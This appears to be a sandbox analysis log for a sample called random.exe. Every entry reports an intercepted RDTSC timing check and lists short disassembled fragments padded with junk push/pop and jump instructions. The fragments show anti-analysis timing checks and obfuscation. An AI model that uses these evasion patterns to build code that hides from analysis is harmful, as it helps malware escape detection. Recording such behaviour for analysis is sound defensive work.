Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD197E second address: FD19AA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8D38B7BC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jno 00007F8D38B7BC86h 0x00000011 pop esi 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F8D38B7BC8Fh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD19AA second address: FD19C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D38E56381h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD1BC1 second address: FD1BED instructions: 0x00000000 rdtsc 0x00000002 js 00007F8D38B7BC93h 0x00000008 jmp 00007F8D38B7BC8Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F8D38B7BC8Ch 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push ebx 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD1BED second address: FD1C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jno 00007F8D38E5638Ch 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jno 00007F8D38E56376h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD1C1F second address: FD1C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38B7BC98h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD1E54 second address: FD1E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F8D38E5637Fh 0x0000000b nop 0x0000000c push 00000004h 0x0000000e mov di, 8873h 0x00000012 nop 0x00000013 pushad 0x00000014 pushad 0x00000015 jnc 00007F8D38E56376h 0x0000001b push esi 0x0000001c pop esi 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8D38E56382h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD24B1 second address: FD24B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD2668 second address: FD266C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD266C second address: FD2670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD2670 second address: FD267C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFD147 second address: FFD14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFD14C second address: FFD166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8D38E56376h 0x00000009 jmp 00007F8D38E5637Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFD3E6 second address: FFD3EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFD3EC second address: FFD41E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56389h 0x00000007 jmp 00007F8D38E56381h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFD41E second address: FFD424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFD424 second address: FFD428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFD428 second address: FFD42E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1003485 second address: 100348B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100348B second address: 10034A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8D38B7BC86h 0x0000000a popad 0x0000000b jg 00007F8D38B7BC8Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10034A0 second address: 10034AA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8D38E5637Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10034AA second address: 10034C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8D38B7BC94h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1001FF0 second address: 1001FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1001FF4 second address: 100200A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8D38B7BC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jl 00007F8D38B7BC86h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100200A second address: 1002030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F8D38E56387h 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007F8D38E56376h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1002030 second address: 1002037 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100215F second address: 1002167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1002167 second address: 1002197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F8D38B7BC86h 0x00000009 jmp 00007F8D38B7BC92h 0x0000000e jnp 00007F8D38B7BC86h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F8D38B7BC86h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1002197 second address: 100219B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100219B second address: 10021A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10021A1 second address: 10021A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10021A7 second address: 10021D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jo 00007F8D38B7BC86h 0x00000010 jmp 00007F8D38B7BC94h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1002309 second address: 1002318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38E5637Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1002318 second address: 1002337 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8D38B7BC95h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1002337 second address: 100234F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56384h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100285B second address: 1002867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8D38B7BC86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1002867 second address: 100286B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10029D1 second address: 10029E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10029E6 second address: 1002A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38E56387h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1002A03 second address: 1002A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1003346 second address: 100334C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100C4A9 second address: 100C4AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100B2DE second address: 100B2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100B460 second address: 100B465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100B465 second address: 100B482 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8D38E56378h 0x00000008 push esi 0x00000009 pop esi 0x0000000a je 00007F8D38E5637Ch 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100B482 second address: 100B48C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100B038 second address: 100B044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100BF0F second address: 100BF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8D38B7BC90h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F8D38B7BC8Ah 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100BF34 second address: 100BF39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100BF39 second address: 100BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38B7BC96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100F86A second address: 100F870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100F870 second address: 100F876 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100F876 second address: 100F880 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8D38E5637Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100F880 second address: 100F887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100F887 second address: 100F8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8D38E5637Ch 0x00000010 jg 00007F8D38E56378h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100F8A6 second address: 100F8B0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8D38B7BC8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F815CB second address: F815E1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8D38E5637Ch 0x00000008 js 00007F8D38E56382h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F815E1 second address: F815E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10127E4 second address: 1012803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007F8D38E5637Ch 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push edi 0x0000000e jno 00007F8D38E56376h 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012803 second address: 1012807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10146B1 second address: 10146B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10146B5 second address: 10146BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10146BB second address: 10146CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10146CA second address: 10146CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10146CE second address: 10146DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8D38E5637Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1014857 second address: 1014876 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8D38B7BC8Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jns 00007F8D38B7BC86h 0x00000010 push edx 0x00000011 jnl 00007F8D38B7BC86h 0x00000017 pop edx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1014876 second address: 101488C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E5637Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F8D38E56376h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101C239 second address: 101C23F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101C5D1 second address: 101C5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101C5D5 second address: 101C5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F8D38B7BC92h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F8D38B7BC86h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101C5F7 second address: 101C5FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101C5FB second address: 101C60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8D38B7BC86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F8D38B7BC86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101C60F second address: 101C619 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8D38E56376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101C8D1 second address: 101C8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101C8D7 second address: 101C8E4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8D38E56376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101C8E4 second address: 101C8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102141F second address: 1021433 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007F8D38E56376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F8D38E56382h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1021433 second address: 102143D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8D38B7BC86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD2081 second address: FD20D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56385h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ecx, dword ptr [ebp+122D1BE2h] 0x00000012 xor edx, dword ptr [ebp+122D2C71h] 0x00000018 mov ebx, dword ptr [ebp+12485F22h] 0x0000001e or dword ptr [ebp+122D38B3h], edx 0x00000024 add eax, ebx 0x00000026 mov ecx, esi 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8D38E56383h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD20D1 second address: FD20D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD20D7 second address: FD212D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F8D38E56378h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 sub dl, 00000010h 0x00000029 push 00000004h 0x0000002b jmp 00007F8D38E56380h 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD212D second address: FD2133 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD2133 second address: FD2168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D38E56386h 0x00000008 jc 00007F8D38E56376h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F8D38E5637Ch 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102B640 second address: 102B65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38B7BC97h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102B65B second address: 102B65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102B65F second address: 102B667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10297C9 second address: 10297CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10297CD second address: 10297D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10297D1 second address: 10297DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10297DD second address: 10297E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1029D3D second address: 1029D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1029D43 second address: 1029D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1029D48 second address: 1029D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102A2EA second address: 102A2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102B0DA second address: 102B0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102B0E0 second address: 102B0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F8D38B7BC86h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102B0F1 second address: 102B12B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jng 00007F8D38E5637Ch 0x0000000e jmp 00007F8D38E56380h 0x00000013 jmp 00007F8D38E5637Ch 0x00000018 jnp 00007F8D38E5637Eh 0x0000001e push edx 0x0000001f pop edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10311C7 second address: 10311CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
